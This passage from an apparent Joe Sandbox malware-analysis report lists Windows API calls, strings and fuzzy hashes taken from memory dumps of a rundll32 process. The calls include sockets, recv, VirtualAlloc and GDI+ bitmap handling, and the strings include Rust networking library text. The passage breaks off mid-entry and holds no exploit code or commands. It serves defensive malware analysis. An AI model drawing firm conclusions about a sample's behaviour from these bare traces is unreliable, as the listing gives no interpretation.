                                • Part of subcall function 04209858: TlsGetValue.KERNEL32(?,?,0420738C,00000000), ref: 04209866
                              • ___fls_setvalue@8.LIBCMT ref: 0420739A
                                • Part of subcall function 042098AC: DecodePointer.KERNEL32(?,?,?,0420739F,00000000,?,00000000), ref: 042098BD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 042073A3
                              • ExitThread.KERNEL32 ref: 042073AA
                              • GetCurrentThreadId.KERNEL32 ref: 042073B0
                              • __freefls@4.LIBCMT ref: 042073D0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 2383549826-0
                              • Opcode ID: fba2fa4b594c316878a1adfa7560edcab40b9aea1bfbf9dd4184a751d6ba9434
                              • Instruction ID: a2cb7e87270287015d30bf367eb7dd3a66234914133e5758d2b5d3e3d2e8eaf9
                              • Opcode Fuzzy Hash: fba2fa4b594c316878a1adfa7560edcab40b9aea1bfbf9dd4184a751d6ba9434
                              • Instruction Fuzzy Hash: 90F036B4720604ABE714BF75D54884EBBE9EFC8248310C464ED0687353DB39FC828BA1
                              APIs
                              • memmove.VCRUNTIME140(?,reqwest-internal-sync-runtimecore thread exited early,0000001D), ref: 6CBC1681
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: */*$reqwest-internal-sync-runtimecore thread exited early$QK$\
                              • API String ID: 2162964266-2385550814
                              • Opcode ID: 6549ecb62e3f9a4782e5d0da49724cffe84350070bd36681948f7f4f2050ec9c
                              • Instruction ID: 01502a12f8d63ca2561a8aa0ac14c4d78920cbc0c27ab999bbd764e8870103da
                              • Opcode Fuzzy Hash: 6549ecb62e3f9a4782e5d0da49724cffe84350070bd36681948f7f4f2050ec9c
                              • Instruction Fuzzy Hash: 9E525A716087858FD325CF24C444BEAB7F0FF89315F058AAEE98D9B252EB709485CB52
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 042032F1
                              • Sleep.KERNEL32(00000258), ref: 042032FE
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04203306
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04203312
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0420331A
                              • Sleep.KERNEL32(0000012C), ref: 0420332B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                              • String ID:
                              • API String ID: 3137405945-0
                              • Opcode ID: 013dece53a6a5f29b4c5b463b69867e49fd7541af16ef335c69ea4f233f8317a
                              • Instruction ID: c1601265802bc13eb5b97468f8356e1838fdd2c6e0d61fe82e1df6878a2707cb
                              • Opcode Fuzzy Hash: 013dece53a6a5f29b4c5b463b69867e49fd7541af16ef335c69ea4f233f8317a
                              • Instruction Fuzzy Hash: 69F054712043146FD6109BADDC84D46B3A8EF99330B104709B221872D0CEB4E8018BA0
                              APIs
                              • _malloc.LIBCMT ref: 04DBF681
                                • Part of subcall function 04DBF5D3: __FF_MSGBANNER.LIBCMT ref: 04DBF5EC
                                • Part of subcall function 04DBF5D3: __NMSG_WRITE.LIBCMT ref: 04DBF5F3
                                • Part of subcall function 04DBF5D3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76), ref: 04DBF618
                              • std::exception::exception.LIBCMT ref: 04DBF6B6
                              • std::exception::exception.LIBCMT ref: 04DBF6D0
                              • __CxxThrowException@8.LIBCMT ref: 04DBF6E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: bad allocation
                              • API String ID: 615853336-2104205924
                              • Opcode ID: aab201280f05becde2bc153f9fc57abfb30ef3b0efbd5f186eeab2c53253321f
                              • Instruction ID: 4057a50c351edfdce5e89d675a513db37d1b9803fe78497e47e35c7682e6ee8b
                              • Opcode Fuzzy Hash: aab201280f05becde2bc153f9fc57abfb30ef3b0efbd5f186eeab2c53253321f
                              • Instruction Fuzzy Hash: 6CF0D171A00209EAEB10EB55CC24AEF3BB9EF00318F04005DD882D2290DBB4FA058BE4
                              APIs
                              • _malloc.LIBCMT ref: 042070F1
                                • Part of subcall function 04207043: __FF_MSGBANNER.LIBCMT ref: 0420705C
                                • Part of subcall function 04207043: __NMSG_WRITE.LIBCMT ref: 04207063
                                • Part of subcall function 04207043: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0420A0B0,?,00000001,?,?,0420C10B,00000018,04217C70,0000000C,0420C19B), ref: 04207088
                              • std::exception::exception.LIBCMT ref: 04207126
                              • std::exception::exception.LIBCMT ref: 04207140
                              • __CxxThrowException@8.LIBCMT ref: 04207151
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: bad allocation
                              • API String ID: 615853336-2104205924
                              • Opcode ID: cd4ebc629b893fe34e93f74a1f95e79df27b9aaa9394053ac3790bd3fd80a9d0
                              • Instruction ID: 633a6d0cddc924308265399f79d965cd385eaa0296d26268169be8820db3c977
                              • Opcode Fuzzy Hash: cd4ebc629b893fe34e93f74a1f95e79df27b9aaa9394053ac3790bd3fd80a9d0
                              • Instruction Fuzzy Hash: A7F0A93173010E6BEB15ABA4DC44E5D7BE69BE1618F108015E404960E1DFB0FB85C791
                              APIs
                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 04202D3C
                              • CancelIo.KERNEL32(?), ref: 04202D46
                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 04202D4F
                              • closesocket.WS2_32(?), ref: 04202D59
                              • SetEvent.KERNEL32(00000001), ref: 04202D63
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                              • String ID:
                              • API String ID: 1486965892-0
                              • Opcode ID: d4421ab24fb5a5b6c6ece570ade8b520a91f6227870ba5fea325cee57ca639b2
                              • Instruction ID: 34776c5b82fa2321ae21a8ddfd518f5d4b3a7f99fe612ced480b1a0d8212d370
                              • Opcode Fuzzy Hash: d4421ab24fb5a5b6c6ece570ade8b520a91f6227870ba5fea325cee57ca639b2
                              • Instruction Fuzzy Hash: B5F03C76200700BBD3209F98EC4DB5677B8FB89B11F104699F68297690CAB4B9448BE0
                              APIs
                                • Part of subcall function 6CBF58F1: memmove.VCRUNTIME140(?,00000000,00000000,00000000,00000000,?,00000020,?,6CC2F033,stream closed because of a broken pipesend_close: unexpected state ,00000026), ref: 6CBF5916
                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CC584BE
                              • WSAGetLastError.WS2_32(?,00000004,?,?,00000002,6CC0288D,?,?,6CCB5F8C,6CCB5F64), ref: 6CC584CB
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC583C2, 6CC5847D
                              • A Tokio 1.x context was found, but it is being shutdown.the timer is shutdown, must be called from the context of Tokio runtimetimer is at capacity and cannot create a new entrytimer duration exceeds maximum durationdeadline has elapsedD:\rust\cargo\registry\s, xrefs: 6CC57F5F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastmemmovesetsockopt
                              • String ID: A Tokio 1.x context was found, but it is being shutdown.the timer is shutdown, must be called from the context of Tokio runtimetimer is at capacity and cannot create a new entrytimer duration exceeds maximum durationdeadline has elapsedD:\rust\cargo\registry\s$called `Result::unwrap()` on an `Err` value
                              • API String ID: 1441254279-3286110522
                              • Opcode ID: 79790b70de6aa19326fe846280581a06ced08451e058eb014dc20e4838e6d6c4
                              • Instruction ID: 3124441ed55809479c73672667a23278cc4b8ae2d02a4052fa1a658e2cf8684c
                              • Opcode Fuzzy Hash: 79790b70de6aa19326fe846280581a06ced08451e058eb014dc20e4838e6d6c4
                              • Instruction Fuzzy Hash: 4602C0B06587408FD314CF25C480B5ABBF0BF89318F50892EE9998B791EB74D869CF46
                              APIs
                              • recv.WS2_32(?,?,?,00000000), ref: 6CC58593
                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CC585A0
                              Strings
                              • filled overflowfilled must not become larger than initialized, xrefs: 6CC58700
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastrecv
                              • String ID: filled overflowfilled must not become larger than initialized
                              • API String ID: 2514157807-3814584485
                              • Opcode ID: cd834f0718c1be4b623b1a102edfde7bcacbd515e423b00628137acfb57050e9
                              • Instruction ID: 281ff3ad627dd0a5ec5a9d58af8690c41f6c6edc3078f3315d8b6eb3a682202b
                              • Opcode Fuzzy Hash: cd834f0718c1be4b623b1a102edfde7bcacbd515e423b00628137acfb57050e9
                              • Instruction Fuzzy Hash: BF618DB05593409FD700CF15C580A1AFBE1BF88314F948A5EF5988B790EB71D869CB8A
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000158), ref: 6CC100B6
                              • memmove.VCRUNTIME140(?,?,00000158), ref: 6CC100D9
                              • memmove.VCRUNTIME140(?,?,00000158), ref: 6CC10198
                              • memmove.VCRUNTIME140(?,?,000001B0), ref: 6CC101BB
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 4031d680bf5d71de12617f3313b9a805d4526c04c56a0840d3d2cecbafeb855a
                              • Instruction ID: 4fe49241b3e7cbb9ea35226c8907d33eeef80d990e2d8436174b1ddb1696454e
                              • Opcode Fuzzy Hash: 4031d680bf5d71de12617f3313b9a805d4526c04c56a0840d3d2cecbafeb855a
                              • Instruction Fuzzy Hash: 7A51173164C384DFCB01DB65C850AEEBBE5BF95354F088859E8C94BB41E730D869D792
                              APIs
                                • Part of subcall function 6CBEB679: WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC
                                • Part of subcall function 6CBEB679: ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA
                                • Part of subcall function 6CBEB679: closesocket.WS2_32(?), ref: 6CBEB9F0
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,6CCB5F8C,6CCB5F64), ref: 6CC02202
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CCB5F8C,6CCB5F64), ref: 6CC0222D
                              Strings
                              • cannot poll Select twice, xrefs: 6CC020FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$Socketclosesocketioctlsocket
                              • String ID: cannot poll Select twice
                              • API String ID: 3048605929-3773267893
                              • Opcode ID: 88eab26839bc5982d738a903d031c578eac12291280153d7fa582554f5831f7c
                              • Instruction ID: 0e19070b46a5a1de58175b201fb9e4776c26bdf92a50f5e21c031c39e0596d9e
                              • Opcode Fuzzy Hash: 88eab26839bc5982d738a903d031c578eac12291280153d7fa582554f5831f7c
                              • Instruction Fuzzy Hash: 1041BD31A08B44CBC751CF69C4909ABB7F1FF9A354F10895EE8992F611EB31E485CB92
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 04DB316B
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04DB3183
                              • GetCurrentThreadId.KERNEL32 ref: 04DB322F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread$ExchangeInterlocked
                              • String ID:
                              • API String ID: 4033114805-0
                              • Opcode ID: 48991f1146cabb514189fb7839d4c4e252bea761e71b0e312975d77e65472408
                              • Instruction ID: 2b2aa7022b78811a3bdbf9b50d0b4c818dd0b68b3d161b44d6f993dc0cf45adc
                              • Opcode Fuzzy Hash: 48991f1146cabb514189fb7839d4c4e252bea761e71b0e312975d77e65472408
                              • Instruction Fuzzy Hash: B7313671200602DFD718DF69C994AAAB3E9FF44748B10C52DE89B8B715E731F841DB90
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 0420314B
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04203163
                              • GetCurrentThreadId.KERNEL32 ref: 0420320F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread$ExchangeInterlocked
                              • String ID:
                              • API String ID: 4033114805-0
                              • Opcode ID: 88f87101ce69337421600af4abb42716e1b11e699cf57e886a06ef23dbb3e8dd
                              • Instruction ID: ce23757db7fd66b44d275e5b2b128d3b3c2cc4f7fddac5f228ea9f71bf28340f
                              • Opcode Fuzzy Hash: 88f87101ce69337421600af4abb42716e1b11e699cf57e886a06ef23dbb3e8dd
                              • Instruction Fuzzy Hash: BE316D70320606AFD718DF69C884A6AF7E5FF48718B10C52DE81ACB696D771F851CB90
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CC4F485
                              • getaddrinfo.WS2_32(?,00000000,?,?), ref: 6CC4F4F0
                              • WSAGetLastError.WS2_32 ref: 6CC4F4FD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastgetaddrinfomemmove
                              • String ID:
                              • API String ID: 1338285005-0
                              • Opcode ID: 006f3ca19f2a41b0710ff26df313ff6b9a3a3e442b3e74593f9fdf8403a4e4b1
                              • Instruction ID: a8346b0f7e5f82f72a80d1bbd949c71d808175c130ed76185d59fa045a4cb1d6
                              • Opcode Fuzzy Hash: 006f3ca19f2a41b0710ff26df313ff6b9a3a3e442b3e74593f9fdf8403a4e4b1
                              • Instruction Fuzzy Hash: A9316CB1E002099FDB10CF95D980BEEBBB4FF45314F14C569E889A7740E774A985CBA1
                              APIs
                              • InterlockedDecrement.KERNEL32(00000008), ref: 04DB530C
                              • SysFreeString.OLEAUT32(00000000), ref: 04DB5321
                              • SysAllocString.OLEAUT32(04DD5148), ref: 04DB5372
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: String$AllocDecrementFreeInterlocked
                              • String ID:
                              • API String ID: 3605875487-0
                              • Opcode ID: 21635bb4bdc66154c805e526087790a04675ef61b3f5c0bc2f2fce173df8341b
                              • Instruction ID: ae681b9babe87a4a95798c9e7225a5be5c767c35489b810e1c09a31688a1593b
                              • Opcode Fuzzy Hash: 21635bb4bdc66154c805e526087790a04675ef61b3f5c0bc2f2fce173df8341b
                              • Instruction Fuzzy Hash: FD318F71A01755EBEB209FA4D890B9A77A8FF04B18F444669EC96DB340D7B5F900CBD0
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000004,000000FF), ref: 6CC649D7
                              • GetLastError.KERNEL32 ref: 6CC649DE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID:
                              • API String ID: 1574541344-0
                              • Opcode ID: 6bc4fa9642e8203db52c6f44d8c8b135ab49e7556db700e6fdadd364c5fa277f
                              • Instruction ID: abcff6106ee36c7415d504522304ba7603a872fbcf1080bbb6fb62de4d288067
                              • Opcode Fuzzy Hash: 6bc4fa9642e8203db52c6f44d8c8b135ab49e7556db700e6fdadd364c5fa277f
                              • Instruction Fuzzy Hash: 1E21F071A4021A9FDF05CF56C9E07AD7BB1FB86318F144128E102BBF40E7389842CB54
                              APIs
                              • __floor_pentium4.LIBCMT ref: 04DB11E9
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DB1226
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DB1255
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: 467471f3b21175756d949a039a2048d644e77935162841952bed21ccd6597b8e
                              • Instruction ID: 867be1d37922cd65f896854478702786b2f7c261c9af600fc6979c6ef64ad0cd
                              • Opcode Fuzzy Hash: 467471f3b21175756d949a039a2048d644e77935162841952bed21ccd6597b8e
                              • Instruction Fuzzy Hash: 86219271B00709EFDB149FA9E855BAEBBF4FF40745F0085ADE88AD2640EA30B8108754
                              APIs
                              • __floor_pentium4.LIBCMT ref: 042011E9
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04201226
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04201255
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: 6503f2d9b2a37e47294090aeef3f8ac1f52b14b21d70e06afffed11013794ef0
                              • Instruction ID: 71100dc4e6fb5630e545d3b5cb0b1e38d973854c76ef305c7fe1df32efd0172f
                              • Opcode Fuzzy Hash: 6503f2d9b2a37e47294090aeef3f8ac1f52b14b21d70e06afffed11013794ef0
                              • Instruction Fuzzy Hash: BB21C271B10209AFDB149FADE985B6EF7F4EF84705F00C5A9E849D3681EA31B8508740
                              APIs
                              • __floor_pentium4.LIBCMT ref: 04DB112F
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DB115F
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DB1192
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: 2b2a30ec812d41eba3aa7e98bbb5c7b79acd44f28e5340304c06720157bd7d85
                              • Instruction ID: d6eed520a2a9d8ae876fc77db7fa6565b4bf6c70bfa3340701dab92148ca2310
                              • Opcode Fuzzy Hash: 2b2a30ec812d41eba3aa7e98bbb5c7b79acd44f28e5340304c06720157bd7d85
                              • Instruction Fuzzy Hash: F7119370A00709EFDB109FA9DC95B6EFBF8FF04785F1085A9E99AE2340E674A9108754
                              APIs
                              • __floor_pentium4.LIBCMT ref: 0420112F
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0420115F
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04201192
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: f8093aaef2773a4b5cec0e9cab6c0a1505d64c174b481dd90ce5d5cd269a51b1
                              • Instruction ID: daec0243587e34aa40de75fc20f96ed6cae628394af91b9d066d47db1d8f4566
                              • Opcode Fuzzy Hash: f8093aaef2773a4b5cec0e9cab6c0a1505d64c174b481dd90ce5d5cd269a51b1
                              • Instruction Fuzzy Hash: F911D370B10309AFEB149FA9D886B6EFBF8FF44705F0084A9ED59D3281E675A850C750
                              APIs
                              • RtlReAllocateHeap.NTDLL(00000000,?,6CC48F66,?,?,?,?,?,6CC48F66,?,?,?,?,?), ref: 6CBC5B0E
                              • memmove.VCRUNTIME140(00000000,?,6CC48F66,?,?,?,?,?,6CC48F66,?,?,?,?,?), ref: 6CBC5B44
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6CC48D0C,?,?,?,00000077), ref: 6CBC5B57
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Heap$AllocateFreememmove
                              • String ID:
                              • API String ID: 94897913-0
                              • Opcode ID: 760e99beb83d4a1e3f8fd0f9d49ecd2fdd633788b5b5ebd09bae2d8beaa2ef2d
                              • Instruction ID: 72b82fd31208fe839d82664adfda14ad7695adf9f0076e0b8fbcf7d1acd673e9
                              • Opcode Fuzzy Hash: 760e99beb83d4a1e3f8fd0f9d49ecd2fdd633788b5b5ebd09bae2d8beaa2ef2d
                              • Instruction Fuzzy Hash: 46014471704204AFDB159F6ACC84E6FBFBAEF86258F058039F94AC3201E7325519C666
                              APIs
                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DB9D54
                              • GdipDisposeImage.GDIPLUS(?), ref: 04DB9D68
                              • GdipDisposeImage.GDIPLUS(?), ref: 04DB9D8B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                              • String ID:
                              • API String ID: 800915452-0
                              • Opcode ID: 640793cb6a025a27e7128918f7fc80997f84d28241fd7bd6d9d57293b71c33f5
